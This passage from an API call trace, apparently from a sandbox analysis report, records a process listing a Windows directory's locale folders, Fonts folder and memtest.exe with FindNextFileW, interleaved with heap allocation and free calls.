ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0183.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0183.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0183.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83930 | out: hHeap=0x620000) returned 1 [0183.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83908 | out: hHeap=0x620000) returned 1 [0183.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0183.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0183.440] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0183.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0183.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83930 [0183.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83980 [0183.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83958 | out: hHeap=0x620000) returned 1 [0183.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83908 | out: hHeap=0x620000) returned 1 [0183.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0183.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0183.441] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.442] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83980 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83930 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839f8 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a20 [0183.442] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.442] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a98 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0183.442] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0183.443] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a20 [0183.443] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x6ec2e0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839f8 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83930 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83980 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ae8 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b10 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b38 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b88 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bb0 [0183.443] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0183.443] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.443] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0183.444] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xce3b5a40, ftLastWriteTime.dwHighDateTime=0x1d03f5f, nFileSizeHigh=0x0, nFileSizeLow=0x795b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0183.444] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x2d08630 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a98 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c00 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c28 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c78 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cc8 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0183.444] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.444] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0183.444] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a20 [0183.445] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bb0 [0183.445] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b88 [0183.445] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x2e912b0 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b38 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b10 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ae8 [0183.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83980 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83930 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839f8 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d18 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d40 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d68 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83d90 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83db8 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83de0 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e08 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e30 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e58 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83e80 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ea8 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ed0 [0183.446] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bb0 [0183.446] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a20 [0183.446] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0183.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83908 [0183.447] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.447] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, 